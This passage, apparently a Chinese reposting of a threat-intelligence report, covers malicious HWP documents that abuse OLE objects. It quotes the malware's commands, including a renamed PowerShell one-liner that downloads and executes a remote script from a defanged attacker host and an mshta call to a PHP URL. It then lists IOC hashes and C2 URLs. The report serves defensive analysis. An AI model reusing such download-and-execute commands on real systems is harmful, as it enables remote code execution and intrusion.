%TEMP%
文件夹中生成如下文件。攻击者不直接使用 powershell.exe 和 mshta.exe 可能是为了要规避检测。%tmp%hwp.exe“hxxp://yukkimmo.sportsontheweb[.]net/hw.php”
),可以根据攻击者的意图来执行各种恶意命令:hword.exe -nop -c ”iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')
。IOC
76f8ccf8313af617df28e8e1f7f39f73
9a13173df687549cfce3b36d8a4e20d3
804d12b116bb40282fbf245db885c093
caa923803152dd9e6b5bf7f6b816ae98
2f4ed70149da3825be16b6057bf7b8df
65993d1cb0d1d7ce218fb267ee36f7c1
330f2f1eb6dc3d753b756a27694ef89b
hxxp://yukkimmo.sportsontheweb.net/hw.php
hxxp://yukkimmo. sportsontheweb[.]net/h.txt
hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt
hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php
参考来源:
https://asec.ahnlab.com/en/38479/
精彩推荐



原文始发于微信公众号(FreeBuf):利用 OLE 对象漏洞的 HWP 恶意文件浮出水面
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论